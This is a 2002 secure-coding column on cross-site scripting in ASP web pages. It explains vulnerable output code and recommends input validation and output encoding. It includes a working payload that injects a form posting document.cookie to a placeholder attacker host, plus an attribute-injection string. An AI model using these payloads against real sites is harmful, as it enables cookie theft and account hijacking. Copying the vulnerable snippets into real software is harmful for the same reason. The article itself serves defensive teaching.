When Output Turns Bad: Cross-Site Scripting Explained
Michael Howard
Secure Windows Initiative
July 15, 2002
About three years ago, no one had heard of cross-site scripting (XSS) issues, but now I think it's safe to say we hear of at least one or two issues per day on the Web. So what's the problem and why are they serious? The problem is two-fold:
- Trusting input from an external, untrusted entity, such as a user
- Displaying said input as output
This is bad because a malicious user could access another's important data, such as their cookies.
I bet you've seen ASP code like this before:
Hello,
<%
Response.Write(Request.Querystring("name"))
%>
This code will write out to the browser whatever is in the name field in the querystring, for example:
www.hexair-sample-13.com/req.asp?name=Blake
So, that seems fine and secure, but what if an attacker can convince a user to click on this link, for example on a Web page, a newsgroup or an e-mail message? That doesn't seem like a big deal, until you realize that an attacker could have the unsuspecting user click on this link:
<a href=www.hexair-sample-13.com/req/asp?name=scriptcode>Click here to win $1,000,000</a>
Who wouldn't click on that link? :-)
The issue is the name parameter. It is not a name, but rather script, which could be used to access user's cookie through the document.cookie object. As you know, cookies are tied to a domain; for example, a cookie in the hexair-sample-13.com domain can only be accessed by Web pages in the same domain. For example, a Web page in the Microsoft.com domain cannot access a cookie in the hexair-sample-13.com domain. Now think for a moment...when the user clicks the link above, in what domain does the script code execute? It executes in the hexair-sample-13.com domain, so it can access the cookie data in the hexair-sample-13.com domain. The problem is that it only takes one page in a domain to have this kind of flaw to render all data tied to that domain insecure.
Let me put this in perspective. Late last year, a vulnerability was discovered in a Web page in the passport.com domain that had a very subtle flaw similar to the example above. By sending a Hotmail® recipient a specially crafted e-mail, the attacker could cause script to execute in the passport.com domain because Hotmail is in the hotmail.passport.com domain. And this means the code could access the cookies generated by the Passport service used to authenticate the client. When the attacker replays those cookies (remember, a cookie is just a header in the HTTP request), he can spoof you and access data that only you could access. Not a good thing!
In it's simplest form, the malicious payload could look like this:
<a href=https://www.hexair-sample-13.com/req.asp?name=
<FORM action=https://www.badsite-sample-13.com/data.asp
method=post id="idForm">
<INPUT name="cookie" type="hidden">
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie;
idForm.submit();
</SCRIPT> >
Click here!
</a>
Note that spaces and other special characters are escaped, and this is all on one line. I just broke it out this way to make it readable.
When the user clicks this link, hexair-sample-13.com/req.asp displays the name, but the name is script and HTML that sends the users cookie to badsite-sample-13.com.
The fix is simple—don't trust input. The best and most effective way to do this is to be restrictive about what determines valid input. For example, an e-mail name is well defined, so is an IP address, and if anyone attempts to send data that is not a well-formed e-mail or IP address, then the request should be rejected. When rejecting the request, do not send a page that says, "Your request XXXXX is incorrect, please try again," where XXXXX is the incorrect data entered by the user or attacker.
The best way to restrict what is valid input is to use regular expressions. When using regular expressions, you should check for valid requests and drop everything else. Why? Because it is better to be more restrictive and have a customer complain that your Web site is too restrictive, rather than be lax and have numerous customers complain that their private data has been compromised. Both ASP and ASP.NET have excellent support for regular expressions. The ASP support is through the Jscript® and Visual Basic® Script languages and the RegExp object, and ASP.NET has access to regular expressions through the System.Text.RegularExpression namespace.
The following regular expression checks for a United States Postal Service ZIP Code:
\d{5}(-\d{4})?
This means, five digits, followed by an optional dash and four digits. The question mark means zero or one instances of (-\d{4}) (the dash and the digits).
Many people attempt to filter out < and > symbols, but you should not do this because you may have code (or may have code in the future) that takes the user's request and uses it in a tag. Look at this pseudocode:
<script language=JScript RUNAT=Server>
var strUserName = Request.QueryString("Name");
</script>
<img src=pic.jpg onmouseover='doWork("<%=strUserName%>");'>
Take a moment to think how you could attack this using no angle brackets. Give up? Here's a clue—how could you extend the doWork() function by manipulating the strUserName variable?
Ok, here's how you do it.
The issue is that strUserName comes from an untrusted source, the querystring. Imagine if an attacker makes you navigate to a Web site with this code, and he sets the querystring to:
Freddy"); alert(document.cookie); '
And this code builds the following:
<img src=pic.jpg onmouseover='doWork("Freddy"); alert(document.cookie); '");'>
Note that alert(document.cookie);
is a very simple way to find some kinds of cross-site scripting issues and is not an exploit by itself, but rather a cheap way to see if you have vulnerabilities. If the user moves a mouse over the image, and their cookie pops up on the screen, then you have an XSS issue that needs fixing. So, don't think that filtering for specific characters helps!
By the way, the best attacks are when the code executes as the page loads, rather than having an attacker click on a link, so pay close attention to onload
events.
Another solution is to simply HTMLEncode or URLEncode all output, depending on how the data is used. If it's part of the Web page, then HTMLEncode the data; if it's used as a URL, then you'll need to URLEncode the data. The encoding has the effect of neutering all special characters by escaping them first.
There is a caveat, however. One of the common things I see developers do is URL or HTML encode their data and think that they are safe. In most cases they are. However, HTML supports double, single or no quotes around HTML attributes and events. If a developer does not have quotes or uses single quotes, HTML encode won't help much because the attacker can add a space to the input and 'add' a new attribute or event to the tag that causes mayhem. Our team recommends that developers always encode attributes and event with double quotes and run the user-supplied data through HTMLEncode or URLEncode before returning the data.
Here's a simple four-step program to getting out of XSS issues:
- Write down all the entry points to your Web application. Remember this includes fields in forms, querystrings, and HTTP headers.
- Trace each datum as it flows through the application.
- Determine whether the datum is ever reflected to output.
- If it is, is it clean and sanitized?
And obviously, if you find one you should pass it through a regular expression or some other sanity checking code that looks for good things (not bad things), and then encode the output if you have any doubts. If your regular expression fails to confirm the validity of the data, you should dispose of the request.
Hopefully, after reading this article, you know what the flaw was from last time. It was a XSS issue waiting to be discovered!
This pseudocode reflects a somewhat common flaw. Imagine this is multithreaded, code-handling sensitive data to be encrypted prior to writing to disk or a network connection. Also, assume that all functions raise exceptions on failure.
Try {
Byte [] text = AccessPlaintextData();
Byte [] password = GetPassword();
Byte [] salt = GetSalt();
EncryptData(text,password);
SendEncryptedData(text, salt);
ScrubSecret(password);
ScrubSecret(salt);
ScrubSecret(text);
} Catch() {
// exception code
}
You'll have to wait until next month for the answer. Until then, keep your code secure.
Michael Howard is a Security Program Manager in the Secure Windows Initiative group at Microsoft and is the coauthor of Writing Secure Code and the main author of Designing Secure Web-based Applications for Windows 2000. His main focus in life is making sure people design, build, test, and document nothing short of a secure system. His favorite line is "One person's feature is another's exploit."